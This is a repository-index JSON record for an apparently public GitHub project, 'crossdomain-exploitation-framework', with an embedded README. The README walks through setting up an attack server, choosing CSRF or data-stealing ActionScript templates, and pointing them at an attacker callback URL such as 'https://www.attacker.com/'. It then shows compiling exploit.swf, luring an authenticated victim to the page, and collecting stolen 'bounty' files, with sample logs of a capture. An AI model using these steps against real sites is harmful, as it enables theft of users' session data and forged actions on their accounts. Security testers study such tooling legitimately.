{"id":17235331,"url":"https://github.com/sethsec/crossdomain-exploitation-framework","last_synced_at":"2026-02-10T20:32:15.892Z","repository":{"id":20430908,"uuid":"23707562","full_name":"sethsec/crossdomain-exploitation-framework","owner":"sethsec","description":"Everything you need to exploit overly permissive crossdomain.xml files","archived":false,"fork":false,"pushed_at":"2014-11-12T20:26:25.000Z","size":311,"stargazers_count":87,"open_issues_count":1,"forks_count":26,"subscribers_count":6,"default_branch":"master","last_synced_at":"2025-08-28T05:28:56.103Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"ActionScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/sethsec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2014-09-05T15:15:37.000Z","updated_at":"2025-07-11T06:25:44.000Z","dependencies_parsed_at":"2022-07-31T19:38:08.184Z","dependency_job_id":null,"html_url":"https://github.com/sethsec/crossdomain-exploitation-framework","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/sethsec/crossdomain-exploitation-framework","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sethsec%2Fcrossdomain-exploitation-framework","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sethsec%2Fcrossdomain-exploitation-framework/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sethsec%2Fcrossdomain-exploitation-framework/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sethsec%2Fcrossdomain-exploitation-framework/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/sethsec","download_url":"https://codeload.github.com/sethsec/crossdomain-exploitation-framework/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sethsec%2Fcrossdomain-exploitation-framework/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29314705,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-10T17:48:59.043Z","status":"ssl_error","status_checked_at":"2026-02-10T17:45:37.240Z","response_time":65,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-10-15T05:33:03.505Z","updated_at":"2026-02-10T20:32:15.874Z","avatar_url":"https://github.com/sethsec.png","language":"ActionScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"crossdomain-exploitation-framework\n==================================\n\nWhile not much of a framework just yet, everything you need to exploit overly permissive crossdomain.xml files is here.   \n\nSupported OS\n==================================\nKali\n\nOSX\n\nDownload and Setup\n==================================\n```ShellSession\nroot@kali:~# git clone https://github.com/sethsec/crossdomain-exploitation-framework.git\nroot@kali:~# cd crossdomain-exploitation-framework\nroot@kali:~/crossdomain-exploitation-framework# ./SWF-server\n```\n\nSample Output - Installation\n==================================\n```ShellSession\nroot@kali:~/crossdomain-exploitation-framework# python SWF-server\n\n**************************************************\n*                                                *\n*              Welcome to SWF Server!            *\n*                                                *\n**************************************************\n\nIt looks like this is the first run.  We need to set up a few things...\n\n[INSTALL] Creating /opt/flex...\n[INSTALL] Downloading Flex (This is a 340MB file)...\n[INSTALL] Downloading: http://download.macromedia.com/pub/flex/sdk/flex_sdk_4.6.zip Bytes: 343973963\n[INSTALL] Extracting Flex to /opt/flex (Takes 5-20 seconds)...\n[INSTALL] Creating a self-signed SSL cert...\n[INSTALL] Copying http-crossdomain.nse to nmap scripts directory...\n[INSTALL] Time to create your own SWF file\n\n     To create your own SWF file:\n\n     1) Chose a template from ./actionscript-templates\n     2) Edit the template (or copy and then edit the template)\n         a) Specify a page on the vulnerable site that you want your victimn to access:\n              Ex: http://vulnerable.com/account/settings\n         b) For data stealing SWFs, specify your attacker callback URL:\n              Ex: http://attacker/, https://192.168.0.100, or https://www.attacker.com/\n         c) For CSRF SWFs, modify the actionscript to extract the information you need\n     3) Compile the ActionScript file and drop the SWF to the ./webroot directory (exploit.swf)\n         a) /opt/flex/bin/mxmlc ./actionscript-templates/\u003ctemplate\u003e.as --output ./webroot/exploit.swf\n\n     4) Re-run ./SWF-server\n\nroot@kali:~/crossdomain-exploitation-framework#\n```\n\nSample Output - SWF creation\n==================================\n```ShellSession\nroot@kali:~/crossdomain-exploitation-framework# ls -l actionscript-templates/\ntotal 24\n-rw-r--r-- 1 501 staff 1952 Sep 28 17:53 CSRF.as\n-rw-r--r-- 1 501 staff 3247 Sep 28 17:53 ExtractCSRFnonceAndSecondItemThenMakePOSTrequest.as\n-rw-r--r-- 1 501 staff 2408 Sep 28 17:53 ExtractCSRFnonceChangeEmailAddress.as\n-rw-r--r-- 1 501 staff 2734 Sep 28 17:53 ExtractCSRFnonceThenMakePOSTrequest.as\n-rw-r--r-- 1 501 staff  985 Oct 10 16:08 README.md\n-rw-r--r-- 1 501 staff 1317 Oct 10 16:10 StealData.as\nroot@kali:~/crossdomain-exploitation-framework/# vi actionscript-templates/StealData.as \nroot@kali:~/crossdomain-exploitation-framework/# /opt/flex/bin/mxmlc actionscript-templates/StealData.as --output /root/crossdomain-exploitation-framework/webroot/exploit.swf\nLoading configuration file /opt/flex/frameworks/flex-config.xml\n/root/crossdomain-exploitation-framework/actionscript-templates/StealData.as: Warning: This compilation unit did not have a factoryClass specified in Frame metadata to load the configured runtime shared libraries. To compile without runtime shared libraries either set the -static-link-runtime-shared-libraries option to true or remove the -runtime-shared-libraries option.\n\n/root/crossdomain-exploitation-framework/webroot/exploit.swf (1085 bytes)\n```\n\nSample Output - Execution\n==================================\n\nOnce you have compiled your SWF and saved it in the web root, you should run SWF-server:\n\n```ShellSession\nroot@kali:~/crossdomain-exploitation-framework# ./SWF-server \n\n**************************************************\n*                                                *\n*              Welcome to SWF Server!            *\n*                                                *\n**************************************************\n\n\n\n      [SWF-Server] Listening on 443/tcp\n      [SWF-Server] Document Root: /root/crossdomain-exploitation-framework/webroot\n      [SWF-Server] Version:       0.9.3\n      [SWF-Server] Use \u003cCtrl-C\u003e to stop\n\n\n Step #1) Hope that your victim is authenticated with the vulnerable site\n Step #2) Convince your victim to arrive at https://\u003cthis-server\u003e/index.html\n Step #3) Collect your bounty at ./bounty/\n\n\n172.16.214.1 - - [13/Oct/2014 15:39:41] \"GET /index.html HTTP/1.1\" 200 -\n172.16.214.1 - - [13/Oct/2014 15:39:41] \"GET /exploit.swf HTTP/1.1\" 200 -\n\n*  New bounty file written to disk: \n*  /root/crossdomain-exploitation-framework/bounty/bounty-172.16.214.1-1413229183.71.txt  \n\n172.16.214.1 - - [13/Oct/2014 15:39:43] \"POST / HTTP/1.1\" 200 -\n\n ```\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsethsec%2Fcrossdomain-exploitation-framework","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsethsec%2Fcrossdomain-exploitation-framework","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsethsec%2Fcrossdomain-exploitation-framework/lists"}